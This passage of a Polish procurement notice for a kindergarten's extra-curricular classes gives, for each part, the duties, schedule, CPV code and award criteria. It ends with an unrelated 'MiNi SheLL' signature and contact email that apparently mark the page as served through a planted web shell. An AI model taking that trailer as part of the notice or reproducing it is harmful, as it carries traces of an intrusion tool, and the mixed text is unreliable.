-	Współpraca z instruktorem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-	Uczestniczenie w ewaluacji projektu,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-	Porządkowanie sal po odbytych zajęciach,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne - zajęcia taneczne  - instruktor..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 1 grupa x 60 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
  Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z nauczycielem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Dzielenie się wiedzą i umiejętnościami za zakresu prowadzonych zajęć z nauczycielem wspomagającym,
-	Uczestniczenie w ewaluacji projektu,
-	Bieżące informowanie rodziców o postępach  dziecka,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie dwukrotnego podsumowania zajęć w postaci  układu tanecznego,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne  - zajęcia taneczne -  nauczyciel..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 1 grupa x 120 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
    Do zakresu obowiązków wykonawcy należy:
- Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z instruktorem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-	Uczestniczenie w ewaluacji projektu,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-	Porządkowanie sal po odbytych zajęciach,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne  - zajęcia z lektorem języka niemieckiego Zabawa z językiem niemieckim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość grup - 2 grupy x 30 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
     Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z nauczycielem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Dzielenie się wiedzą i umiejętnościami za zakresu prowadzonych zajęć z nauczycielem wspomagającym,
-	Uczestniczenie w ewaluacji projektu,
-	Bieżące informowanie rodziców o postępach  dziecka,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Prowadzenie zajęć  językowych  w ramach zajęć dodatkowych rozwijających kompetencje indywidualne dzieci
-	Prezentacja umiejętności językowych przez dzieci,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia rozwijające kompetencje indywidualne - zajęcia opiekuńczo-wychowawcze z nauczycielem w wydłużonym czasie pracy przedszkola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość godzin w miesiącu - 20 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
   Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z instruktorem  realizującym wspólnie  zajęcia  w ramach projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-	Uczestniczenie w ewaluacji projektu,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-	Porządkowanie sal po odbytych zajęciach,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia specjalistyczne - zajęcia z logopedą..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 30 dzieci x 8 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
     Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-	Uczestniczenie w ewaluacji projektu,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-	Porządkowanie sal po odbytych zajęciach,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia specjalistyczne z psychologiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20 dzieci x 6 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
22 rodziców x ok. 3,5h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
     Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-	Uczestniczenie w ewaluacji projektu,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-	Porządkowanie sal po odbytych zajęciach,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia specjalistyczne z gimnastyki korekcyjnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 grupy x 60h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
     Do zakresu obowiązków wykonawcy należy:
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Opracowanie programu realizacji zajęć,
-	Współpraca  z kierownikiem projektu i animatorem projektu,
-	Współpraca z zespołem projektowym w zakresie przygotowywania harmonogramów  zajęć  dodatkowych, 
-	Prowadzenie dokumentacji (dziennik zajęć) realizowanych zajęć  zgodnie z wytycznymi zawartymi w projekcie,
-	Uczestniczenie w ewaluacji projektu,
-	Dbałość o powierzone pomoce dydaktyczne  do prowadzenia zajęć,
-	Przygotowanie sal i pomocy dydaktycznych do zajęć projektowych,
-	Porządkowanie sal po odbytych zajęciach,
-	Przestrzeganie zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Koordynacja realizowanych w ramach projektu zajęć specjalistycznych
i rozwijających kompetencje indywidualne - animator projektu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 50h/miesiąc - 1200 h w latach szkolnych 2011/2012, 2012/2013, zajęcia realizowane w godzinach od 13.00 do 18.00 zgodnie z opracowanym harmonogramem.
-	Zapoznanie się z celami szczegółowymi realizowanego projektu,
-	Zatwierdzanie opracowanych przez instruktorów programów realizacji zajęć,
-	Prowadzenie dokumentacji realizowanych zajęć innej niż dzienniki zajęć,
-	Monitorowanie frekwencji uczestnictwa w zajęciach, zapobieganie ryzyku przerwania udziału w projekcie,
-	Współpraca  z kierownikiem projektu,
-	Współpraca z instruktorami i nauczycielami  realizującymi  zajęcia  w ramach projektu,
-	Realizacja ewaluacji projektu,
-	Nadzór nad przestrzeganiem zasad bezpieczeństwa i higieny (BHP) obowiązujących na terenie przedszkola przez osoby prowadzące zajęcia projektowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie zawodowe - 30</li>
<li>3. Dodatkowe kwalifikacje zawodowe - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com